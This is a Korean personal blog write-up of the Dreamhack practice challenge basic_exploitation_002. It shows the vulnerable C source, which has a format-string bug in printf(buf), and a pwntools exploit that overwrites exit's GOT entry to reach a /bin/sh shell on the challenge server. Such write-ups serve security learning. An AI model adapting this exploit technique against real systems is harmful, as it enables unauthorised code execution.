dreamhack - basic_exploitation

Notice

Recent Posts

Recent Comments

Link

« 2024/10 »
일	월	화	수	목	금	토
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

Tags more

Archives

Today

Total

관리 메뉴

외로운 Nova의 작업실

dreamhack - basic_exploitation_002 본문

Computer App Penetesting/System Vulnerability

dreamhack - basic_exploitation_002

Nova_ 2023. 4. 27. 14:59

- source code

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}


void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}

void get_shell() {
    system("/bin/sh");
}

int main(int argc, char *argv[]) {

    char buf[0x80];

    initialize();

    read(0, buf, 0x80);
    printf(buf);

    exit(0);
}

- exploit code

from pwn import *

p = remote("23.81.42.210",22878 )

#getshell = 0x8048609
#0x804 = 2052, 0x8609 = 34313
#34313 - 2052 = 32261

exit = 0x804a024

payload = p32(exit+2) + p32(exit)
payload += b"%2044c%1$hn%32261c%2$hn"

p.send(payload)

p.interactive()

- 알게된점

32비트에서는 cdecl 함수호출 규격을 사용하기때문에 아래2개는 같은 의미다.

printf("\x12\x34\x56\x78%123c%1$n")

printf("%123c%1$n", "\x12\x34\x56\x78")

'Computer App Penetesting > System Vulnerability' 카테고리의 다른 글

dreamhack - basic_exploitation_003 (0)	2023.04.28
dreamhack - OOB write up (0)	2023.04.25
dreamhack - fho write up (0)	2023.04.24
dreamhack - hook write up (0)	2023.04.22
dreamhack - oneshot write up (0)	2023.04.21

'Computer App Penetesting/System Vulnerability' Related Articles

Comments

외로운 Nova의 작업실

dreamhack - basic_exploitation_002 본문

dreamhack - basic_exploitation_002

'Computer App Penetesting > System Vulnerability' 카테고리의 다른 글

티스토리툴바